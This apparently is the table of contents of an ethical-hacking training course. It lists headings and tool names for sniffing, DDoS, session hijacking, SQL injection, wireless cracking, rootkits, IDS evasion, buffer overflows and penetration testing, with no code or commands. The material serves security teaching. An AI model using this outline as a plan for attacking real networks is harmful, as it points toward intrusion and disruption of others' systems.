Windows Tool: Etherflood
o Threats of ARP Poisoning
o Irs-Arp Attack Tool
o ARPWorks Tool
o Tool: Nemesis
o IP-based sniffing
Linux Sniffing Tools (dsniff package)
o Linux tool: Arpspoof
o Linux Tool: Dnsspoof
o Linux Tool: Dsniff
o Linux Tool: Filesnarf
o Linux Tool: Mailsnarf
o Linux Tool: Msgsnarf
o Linux Tool: Sshmitm
o Linux Tool: Tcpkill
o Linux Tool: Tcpnice
o Linux Tool: Urlsnarf
o Linux Tool: Webspy
o Linux Tool: Webmitm
DNS Poisoning Techniques
o Intranet DNS Spoofing (Local Network)
o Internet DNS Spoofing (Remote Network)
o Proxy Server DNS Poisoning
o DNS Cache Poisoning
Interactive TCP Relay
Interactive Replay Attacks
Raw Sniffing Tools
Features of Raw Sniffing Tools
o HTTP Sniffer: EffeTech
o Ace Password Sniffer
o Win Sniffer
o MSN Sniffer
o SmartSniff
o Session Capture Sniffer: NetWitness
o Session Capture Sniffer: NWreader
o Packet Crafter Craft Custom TCP/IP Packets
o SMAC
o NetSetMan Tool
o Ntop
o EtherApe
o Network Probe
o Maa Tec Network Analyzer
o Tool: Snort
o Tool: Windump
o Tool: Etherpeek
o NetIntercept
o Colasoft EtherLook
o AW Ports Traffic Analyzer
o Colasoft Capsa Network Analyzer
o CommView
o Sniffem
o NetResident
o IP Sniffer
o Sniphere
o IE HTTP Analyzer
o BillSniff
o URL Snooper
o EtherDetect Packet Sniffer
o EffeTech HTTP Sniffer
o AnalogX Packetmon
o Colasoft MSN Monitor
o IPgrab
o EtherScan Analyzer

Social Engineering


What is Social Engineering?
Human Weakness
“Rebecca” and “Jessica”
Office Workers
Types of Social Engineering
o Human-Based Social Engineering
• Technical Support Example
• More Social Engineering Examples
• Human-Based Social Engineering: Eavesdropping
• Human-Based Social Engineering: Shoulder Surfing
• Human-Based Social Engineering: Dumpster Diving
• Dumpster Diving Example
• Oracle Snoops Microsoft’s Trash Bins
• Movies to Watch for Reverse Engineering
o Computer Based Social Engineering
o Insider Attack
o Disgruntled Employee
o Preventing Insider Threat
o Common Targets of Social Engineering
Social Engineering Threats
o Online
o Telephone
o Personal approaches
o Defenses Against Social Engineering Threats
Factors that make Companies Vulnerable to Attacks
Why is Social Engineering Effective
Warning Signs of an Attack
Tool : Netcraft Anti-Phishing Toolbar
Phases in a Social Engineering Attack
Behaviors Vulnerable to Attacks
Impact on the Organization
Countermeasures
Policies and Procedures
Security Policies - Checklist

Denial-of-Service


Real World Scenario of DoS Attacks
What are Denial-of-Service Attacks
Goal of DoS
Impact and the Modes of Attack
Types of Attacks
DoS Attack Classification
o Smurf Attack
o Buffer Overflow Attack
o Ping of Death Attack
o Teardrop Attack
o SYN Attack
o SYN Flooding
o DoS Attack Tools
o DoS Tool: Jolt2
o DoS Tool: Bubonic.c
o DoS Tool: Land and LaTierra
o DoS Tool: Targa
o DoS Tool: Blast
o DoS Tool: Nemesy
o DoS Tool: Panther2
o DoS Tool: Crazy Pinger
o DoS Tool: SomeTrouble
o DoS Tool: UDP Flood
o DoS Tool: FSMax
Bot (Derived from the Word RoBOT)
Botnets
Uses of Botnets
How Do They Infect? Analysis of Agobot
How Do They Infect
Tool: Nuclear Bot
What is DDoS Attack
Characteristics of DDoS Attacks
DDoS Unstoppable
Agent Handler Model
DDoS IRC based Model
DDoS Attack Taxonomy
Amplification Attack
Reflective DNS Attacks
Reflective DNS Attacks Tool: ihateperl.pl
DDoS Tools
o DDoS Tool: Trinoo
o DDoS Tool: Tribal Flood Network
o DDoS Tool: TFN2K
o DDoS Tool: Stacheldraht
o DDoS Tool: Shaft
o DDoS Tool: Trinity
o DDoS Tool: Knight and Kaiten
o DDoS Tool: Mstream
Worms
Slammer Worm
Spread of Slammer Worm – 30 min
MyDoom.B
SCO Against MyDoom Worm
How to Conduct a DDoS Attack
The Reflected DoS Attacks
Reflection of the Exploit
Countermeasures for Refl ected DoS
DDoS Countermeasures
Taxonomy of DDoS Countermeasures
Preventing Secondary Victims
Detect and Neutralize Handlers
Detect Potential Attacks

Session Hijacking


What is Session Hijacking?
Spoofing vs. Hijacking
Steps in Session Hijacking
Types of Session Hijacking
Session Hijacking Levels
Network Level Hijacking
The 3-Way Handshake
TCP Concepts 3-Way Handshake
Sequence Numbers
Sequence Number Prediction
TCP/IP hijacking
IP Spoofing: Source Routed Packets
RST Hijacking
o RST Hijacking Tool: hijack_rst.sh
Blind Hijacking
Man in the Middle: Packet Sniffer
UDP Hijacking
Application Level Hijacking
Programs that Perform Session Hijacking
o Juggernaut
o Hunt
o TTY-Watcher
o IP watcher
o Session Hijacking Tool: T-Sight
o Remote TCP Session Reset Utility (SOLARWINDS)
o Paros HTTP Session Hijacking Tool
o Dnshijacker Tool
o Hjksuite Tool
Dangers that Hijacking Poses
Protecting against Session Hijacking
Countermeasures: IPSec

Hacking Web Servers


How Web Servers Work
How are Web Servers Compromised
Web Server Defacement
o How are Servers Defaced
Apache Vulnerability
Attacks against IIS
o IIS Components
o IIS Directory Traversal (Unicode) Attack
Unicode
o Unicode Directory Traversal Vulnerability
Hacking Tool
o Hacking Tool: IISxploit.exe
o Msw3prt IPP Vulnerability
o RPC DCOM Vulnerability
o ASP Trojan
o Network Tool: Log Analyzer
o Hacking Tool: CleanIISLog
o ServerMask ip100
o Tool: CacheRight
o Tool: CustomError
o Tool: HttpZip
o Tool: LinkDeny
o Tool: ServerDefender AI
o Tool: ZipEnable
o Tool: w3compiler
o Yersinia
Tool: MPack
Tool: Neosploit
Hotfixes and Patches
What is Patch Management
Patch Management Checklist
o Solution: UpdateExpert
o Patch Management Tool: qfecheck
o Patch Management Tool: HFNetChk
o cacls.exe utility
o Shavlik NetChk Protect
o Kaseya Patch Management
o IBM Tivoli Configuration Manager
o LANDesk Patch Manager
o BMC Patch Manager
o ConfigureSoft Enterprise Configuration Manager (ECM)
o BladeLogic Configuration Manager
o Opsware Server Automation System (SAS)
o Best Practices for Patch Management
Vulnerability Scanners
Online Vulnerability Search Engine
Network Tool: Whisker
Network Tool: N-Stealth HTTP Vulnerability Scanner
Hacking Tool: WebInspect
Network Tool: Shadow Security Scanner
Secure IIS
o ServersCheck Monitoring
o GFI Network Server Monitor
o Servers Alive
o Webserver Stress Tool

Web-Based Password Cracking Techniques


Authentication - Definition
Authentication Mechanisms
o HTTP Authentication
• Basic Authentication
• Digest Authentication
o Integrated Windows (NTLM) Authentication
o Negotiate Authentication
o Certificate-based Authentication
o Forms-based Authentication
o RSA SecurID Token
o Biometrics Authentication
• Types of Biometrics Authentication
Fingerprint-based Identification
Hand Geometry-based Identification
Retina Scanning
Face Recognition
Face Code: WebCam Based Biometrics Authentication System
Bill Gates at the RSA Conference 2006
How to Select a Good Password
Things to Avoid in Passwords
Changing Your Password
Protecting Your Password
Examples of Bad Passwords
The “Mary Had A Little Lamb” Formula
How Hackers Get Hold of Passwords
Windows XP: Remove Saved Passwords
What is a Password Cracker
Modus Operandi of an Attacker Using a Password Cracker
How Does a Password Cracker Work
Attacks - Classification
o Password Guessing
o Query String
o Cookies
o Dictionary Maker
Password Crackers Available
o L0phtCrack (LC4)
o John the Ripper
o Brutus
o ObiWaN
o Authforce
o Hydra
o Cain & Abel
o RAR
o Gammaprog
o WebCracker
o Munga Bunga
o PassList
o SnadBoy
o MessenPass
o Wireless WEP Key Password Spy
o RockXP
o Password Spectator Pro
o Passwordstate
o Atomic Mailbox Password Cracker
o Advanced Mailbox Password Recovery (AMBPR)
o Tool: Network Password Recovery
o Tool: Mail PassView
o Tool: Messenger Key
o Tool: SniffPass
o WebPassword
o Password Administrator
o Password Safe
o Easy Web Password
o PassReminder
o My Password Manager

SQL Injection


What is SQL Injection
Exploiting Web Applications
Steps for performing SQL injection
What You Should Look For
What If It Doesn’t Take Input
OLE DB Errors
Input Validation Attack
SQL injection Techniques
How to Test for SQL Injection Vulnerability
How Does It Work
BadLogin.aspx.cs
BadProductList.aspx.cs
Executing Operating System Commands
Getting Output of SQL Query
Getting Data from the Database Using ODBC Error Message
How to Mine all Column Names of a Table
How to Retrieve any Data
How to Update/Insert Data into Database
SQL Injection in Oracle
SQL Injection in MySQL Database
Attacking Against SQL Servers
SQL Server Resolution Service (SSRS)
Osql -L Probing
SQL Injection Automated Tools
Automated SQL Injection Tool: AutoMagic SQL
Absinthe Automated SQL Injection Tool
o Hacking Tool: SQLDict
o Hacking Tool: SQLExec
o SQL Server Password Auditing Tool: sqlbf
o Hacking Tool: SQLSmack
o Hacking Tool: SQL2.exe
o sqlmap
o sqlninja
o SQLIer
o Automagic SQL Injector
Blind SQL Injection
o Blind SQL Injection: Countermeasure
o Blind SQL Injection Schema
SQL Injection Countermeasures
Preventing SQL Injection Attacks
GoodLogin.aspx.cs
SQL Injection Blocking Tool: SQL Block
Acunetix Web Vulnerability Scanner

Hacking Wireless Networks


Introduction to Wireless
o Introduction to Wireless Networking
o Wired Network vs. Wireless Network
o Effects of Wireless Attacks on Business
o Types of Wireless Network
o Advantages and Disadvantages of a Wireless Network
Wireless Standards
o Wireless Standard: 802.11a
o Wireless Standard: 802.11b – “WiFi”
o Wireless Standard: 802.11g
o Wireless Standard: 802.11i
o Wireless Standard: 802.11n
Wireless Concepts and Devices
o Related Technology and Carrier Networks
o Antennas
o Wireless Access Points
o SSID
o Beacon Frames
o Is the SSID a Secret
o Setting up a WLAN
o Authentication and Association
o Authentication Modes
o The 802.1X Authentication Process
WEP and WPA
o Wired Equivalent Privacy (WEP)
o WEP Issues
o WEP - Authentication Phase
o WEP - Shared Key Authentication
o WEP - Association Phase
o WEP Flaws
o What is WPA
o WPA Vulnerabilities
o WEP, WPA, and WPA2
o WPA2 Wi-Fi Protected Access 2
Attacks and Hacking Tools
o Terminologies
o WarChalking
o Authentication and (Dis) Association Attacks
o WEP Attack
o Cracking WEP
o Weak Keys (a.k.a. Weak IVs)
o Problems with WEP’s Key Stream and Reuse
o Automated WEP Crackers
o Pad-Collection Attacks
o XOR Encryption
o Stream Cipher
o WEP Tool: Aircrack
o Aircrack-ng
o WEP Tool: AirSnort
o WEP Tool: WEPCrack
o WEP Tool: WepLab
o Attacking WPA Encrypted Networks
o Attacking WEP with WEPCrack on Windows using Cygwin
o Attacking WEP with WEPCrack on Windows using PERL Interpreter
o Tool: Wepdecrypt
o WPA-PSK Cracking Tool: CowPatty
o 802.11 Specific Vulnerabilities
o Evil Twin: Attack
o Rogue Access Points
o Tools to Generate Rogue Access Points: Fake AP
o Tools to Detect Rogue Access Points: Netstumbler
o Tools to Detect Rogue Access Points: MiniStumbler
o ClassicStumbler
o AirFart
o AP Radar
o Hotspotter
o Cloaked Access Point
o WarDriving Tool: shtumble
o Temporal Key Integrity Protocol (TKIP)
o LEAP: The Lightweight Extensible Authentication Protocol
o LEAP Attacks
o LEAP Attack Tool: ASLEAP
o Working of ASLEAP
o MAC Sniffing and AP Spoofing
o Defeating MAC Address Filtering in Windows
o Manually Changing the MAC Address in Windows XP and 2000
o Tool to Detect MAC Address Spoofing: Wellenreiter
o Man-in-the-Middle Attack (MITM)
o Denial-of-Service Attacks
o DoS Attack Tool: Fatajack
o Hijacking and Modifying a Wireless Network
o Phone Jammers
o Phone Jammer: Mobile Blocker
o Pocket Cellular Style Cell Phone Jammer
o 2.4 GHz Wi-Fi & Wireless Camera Jammer
o 3 Watt Digital Cell Phone Jammer
o 3 Watt Quad Band Digital Cellular Mobile Phone Jammer
o 20W Quad Band Digital Cellular Mobile Phone Jammer
o 40W Digital Cellular Mobile Phone Jammer
o Detecting a Wireless Network
Scanning Tools
o Scanning Tool: Kismet
o Scanning Tool: Prismstumbler
o Scanning Tool: MacStumbler
o Scanning Tool: Mognet V1.16
o Scanning Tool: WaveStumbler
o Scanning Tool: Netchaser V1.0 for Palm Tops
o Scanning Tool: AP Scanner
o Scanning Tool: Wavemon
o Scanning Tool: Wireless Security Auditor (WSA)
o Scanning Tool: AirTraf
o Scanning Tool: WiFi Finder
o Scanning Tool: Wifi Scanner
o eEye Retina WiFi
o Simple Wireless Scanner
o wlanScanner
Sniffing Tools
o Sniffing Tool: AiroPeek
o Sniffing Tool: NAI Wireless Sniffer
o MAC Sniffing Tool: Wireshark
o Sniffing Tool: vxSniffer
o Sniffing Tool: Etherpeg
o Sniffing Tool: Driftnet
o Sniffing Tool: AirMagnet
o Sniffing Tool: WinDump
o Sniffing Tool: Ssidsniff
o Multiuse Tool: THC-RUT
o Tool: WinPcap
o Tool: AirPcap
o AirPcap: Example Program from the Developer’s Pack
Hacking Wireless Networks
o Steps for Hacking Wireless Networks
o Step 1: Find Networks to Attack
o Step 2: Choose the Network to Attack
o Step 3: Analyzing the Network
o Step 4: Cracking the WEP Key
o Step 5: Sniffing the Network
Wireless Security
o WIDZ: Wireless Intrusion Detection System
o Radius: Used as Additional Layer in Security
o Securing Wireless Networks
o Wireless Network Security Checklist
o WLAN Security: Passphrase
o Don’ts in Wireless Security
Wireless Security Tools
o WLAN Diagnostic Tool: CommView for WiFi PPC
o WLAN Diagnostic Tool: AirMagnet Handheld Analyzer

Linux Hacking


Why Linux
Linux Distributions
Linux Live CD-ROMs
Basic Commands of Linux: Files & Directories
Linux Basics
o Linux File Structure
o Linux Networking Commands
Directories in Linux
Installing, Configuring, and Compiling the Linux Kernel
How to Install a Kernel Patch
Compiling Programs in Linux
GCC Commands
Make Files
Make Install Command
Linux Vulnerabilities
Chrooting
Why is Linux Hacked
How to Apply Patches to Vulnerable Programs
Scanning Networks
Nmap in Linux
Scanning Tool: Nessus
Port Scan Detection Tools
Password Cracking in Linux: Xcrack
Firewall in Linux: IPTables
IPTables Command
Basic Linux Operating System Defense
SARA (Security Auditor's Research Assistant)
Linux Tool: Netcat
Linux Tool: tcpdump
Linux Tool: Snort
Linux Tool: SAINT
Linux Tool: Wireshark
Linux Tool: Abacus Port Sentry
Linux Tool: DSniff Collection
Linux Tool: Hping2
Linux Tool: Sniffit
Linux Tool: Nemesis
Linux Tool: LSOF
Linux Tool: IPTraf
Linux Tool: LIDS
Hacking Tool: Hunt
Tool: TCP Wrappers
Linux Loadable Kernel Modules
Hacking Tool: Linux Rootkits
Rootkits: Knark & Torn
Rootkits: Tuxit, Adore, Ramen
Rootkit: Beastkit
Rootkit Countermeasures
‘chkrootkit’ detects the following Rootkits

Evading IDS, Firewalls and Detecting Honey Pots


Introduction to Intrusion Detection System
Terminologies
Intrusion Detection System (IDS)
o IDS Placement
o Ways to Detect an Intrusion
o Types of Intrusion Detection Systems
o System Integrity Verifiers (SIVs)
o Tripwire
o Cisco Security Agent (CSA)
o True/False, Positive/Negative
o Signature Analysis
o General Indication of Intrusion: System Indications
o General Indication of Intrusion: File System Indications
o General Indication of Intrusion: Network Indications
o Intrusion Detection Tools
• Snort
• Running Snort on Windows 2003
• Snort Console
• Testing Snort
• Configuring Snort (snort.conf)
• Snort Rules
• Set up Snort to Log to the Event Logs and to Run as a Service
• Using EventTriggers.exe for Event Log Notifications
• SnortSam
o Steps to Perform after an IDS detects an attack
o Evading IDS Systems
• Ways to Evade IDS
• Tools to Evade IDS
IDS Evading Tool: ADMutate
Packet Generators
What is a Firewall?
o What Does a Firewall Do
o Packet Filtering
o What Can’t a Firewall Do
o How does a Firewall work
o Firewall Operations
o Hardware Firewall
o Software Firewall
o Types of Firewall
• Packet Filtering Firewall
• IP Packet Filtering Firewall
• Circuit-Level Gateway
• TCP Packet Filtering Firewall
• Application Level Firewall
• Application Packet Filtering Firewall
• Stateful Multilayer Inspection Firewall
o Packet Filtering Firewall
o Firewall Identification
o Firewalking
o Banner Grabbing
o Breaching Firewalls
o Bypassing a Firewall using HTTPTunnel
o Placing Backdoors through Firewalls
o Hiding Behind a Covert Channel: LOKI
o Tool: NCovert
o ACK Tunneling

Common Tool for Testing Firewall and IDS
o IDS Testing Tool: IDS Informer
o IDS Testing Tool: Evasion Gateway
o IDS Tool: Event Monitoring Enabling Responses to Anomalous Live Disturbances (Emerald)
o IDS Tool: BlackICE
o IDS Tool: Next-Generation Intrusion Detection Expert System (NIDES)
o IDS Tool: SecureHost
o IDS Tool: Snare
o IDS Testing Tool: Traffic IQ Professional
o IDS Testing Tool: TCPOpera
o IDS Testing Tool: Firewall Informer
o Atelier Web Firewall Tester
What is a Honeypot?
o The Honeynet Project
o Types of Honeypots
Low-interaction honeypot
Medium-interaction honeypot
High-interaction honeypot
o Advantages and Disadvantages of a Honeypot
o Where to place Honeypots
o Honeypots
• Honeypot: SPECTER
• Honeypot: honeyd
• Honeypot: KFSensor
• Sebek
o Physical and Virtual Honeypots
Tools to Detect Honeypots
What to do when hacked

Buffer Overflows


Why are Programs/Applications Vulnerable
Buffer Overflows
Reasons for Buffer Overflow Attacks
Knowledge Required to Program Buffer Overflow Exploits
Understanding Stacks
Understanding Heaps
Types of Buffer Overflows: Stack-based Buffer Overflow
o A Simple Uncontrolled Overflow of the Stack
o Stack Based Buffer Overflows
Types of Buffer Overflows: Heap-based Buffer Overflow
o Heap Memory Buffer Overflow Bug
o Heap-based Buffer Overflow
Understanding Assembly Language
o Shellcode
How to Detect Buffer Overflows in a Program
o Attacking a Real Program
NOPs
How to Mutate a Buffer Overflow Exploit
Once the Stack is Smashed
Defense Against Buffer Overflows
o Tool to Defend Buffer Overflow: Return Address Defender (RAD)
o Tool to Defend Buffer Overflow: StackGuard
o Tool to Defend Buffer Overflow: Immunix System
o Vulnerability Search: NIST
o Valgrind
o Insure++
Buffer Overflow Protection Solution: Libsafe
o Comparing Functions of libc and Libsafe
Simple Buffer Overflow in C
o Code Analysis

Cryptography


Introduction to Cryptography
Classical Cryptographic Techniques
o Encryption
o Decryption
Cryptographic Algorithms
RSA (Rivest Shamir Adleman)
o Example of RSA Algorithm
o RSA Attacks
o RSA Challenge
Data Encryption Standard (DES)
o DES Overview
RC4, RC5, RC6, Blowfish
o RC5
Message Digest Functions
o One-way Hash Functions
o MD5
SHA (Secure Hash Algorithm)
SSL (Secure Sockets Layer)
What is SSH?
o SSH (Secure Shell)
Algorithms and Security
Disk Encryption
Government Access to Keys (GAK)
Digital Signature
o Components of a Digital Signature
o Method of Digital Signature Technology
o Digital Signature Applications
o Digital Signature Standard
o Digital Signature Algorithm: Signature Generation/Verification
o Digital Signature Algorithms: ECDSA, ElGamal Signature Scheme
o Challenges and Opportunities
Digital Certificates
CypherCalc
Command Line Scriptor
CryptoHeaven
Hacking Tool: PGP Crack
Magic Lantern
Advanced File Encryptor
Encryption Engine
Encrypt Files
Encrypt PDF
Encrypt Easy
Encrypt my Folder
Advanced HTML Encrypt and Password Protect
Encrypt HTML source
Alive File Encryption
Omziff
ABC CHAOS
EncryptOnClick
CryptoForge
SafeCryptor
CrypTool
Microsoft Cryptography Tools
Polar Crypto Light
CryptoSafe
Crypt Edit
CrypSecure
Cryptlib
Crypto++ Library
Code Breaking: Methodologies
Cryptanalysis
Cryptography Attacks
Brute-Force Attack

Penetration Testing


Introduction to Penetration Testing (PT)
Vulnerability Assessment
Limitations of Vulnerability Assessment
Penetration Testing
Types of Penetration Testing
Risk Management
Do-It-Yourself Testing
Outsourcing Penetration Testing Services
Terms of Engagement
Project Scope
Pentest Service Level Agreements
Testing Points
Testing Locations
Automated Testing
Manual Testing
Using DNS Domain Name and IP Address Information
Enumerating Information about Hosts on Publicly Available Networks
Testing Network-filtering Devices
Enumerating Devices
Denial-of-Service Emulation
Pentest using Appscan
HackerShield
Pen-Test Using Cerberus Internet Scanner
Pen-Test Using Cybercop Scanner
Pen-Test Using FoundScan Hardware Appliances
Pen-Test Using Nessus
Pen-Test Using NetRecon
Pen-Test Using SAINT
Pen-Test Using SecureNet Pro
Pen-Test Using SecureScan
Pen-Test Using SATAN, SARA and Security Analyzer
Pen-Test Using STAT Analyzer
Pentest Using VigilENT
Pentest Using WebInspect
Pentest Using CredDigger
Pentest Using Nsauditor
Evaluating Different Types of Pen-Test Tools
Asset Audit
Fault Tree and Attack Trees
Business Impact of Threat
Internal Metrics Threat
External Metrics Threat
Calculating Relative Criticality
Test Dependencies
Defect Tracking Tools: Bug Tracker Server
Disk Replication Tools
DNS Zone Transfer Testing Tools
Network Auditing Tools
Trace Route Tools and Services
Network Sniffing Tools
Denial of Service Emulation Tools
Traditional Load Testing Tools
System Software Assessment Tools
Operating System Protection Tools
Fingerprinting Tools
Port Scanning Tools
Directory and File Access Control Tools
File Share Scanning Tools
Password Directories
Password Guessing Tools
Link Checking Tools
Web-Testing-Based Scripting Tools
Buffer Overflow Protection Tools
File Encryption Tools
Database Assessment Tools
Keyboard Logging and Screen Recording Tools
System Event Logging and Reviewing Tools

Hacking Routers, Cable Modems and Firewalls


Network Devices
Identifying a Router
o SING: Tool for Identifying the Router
HTTP Configuration Arbitrary Administrative Access Vulnerability
ADMsnmp
Solarwinds MIB Browser
Brute-Forcing Login Services
Hydra
Analyzing the Router Config
Cracking the Enable Password
Tool: Cain and Abel
Implications of a Router Attack
Types of Router Attacks
Router Attack Topology
Denial of Service (DoS) Attacks
Packet “Mistreating” Attacks
Routing Table Poisoning
Hit-and-run Attacks vs. Persistent Attacks
Cisco Router
o Finding a Cisco Router
o How to Get into Cisco Router
o Breaking the Password
o Is Anyone Here
o Covering Tracks
o Looking Around
Eigrp-tool
Tool: Zebra
Tool: Yersinia for HSRP, CDP, and other layer 2 attacks
Tool: Cisco Torch
Monitoring SMTP (port 25) Using SLcheck
Monitoring HTTP (port 80)
Cable Modem Hacking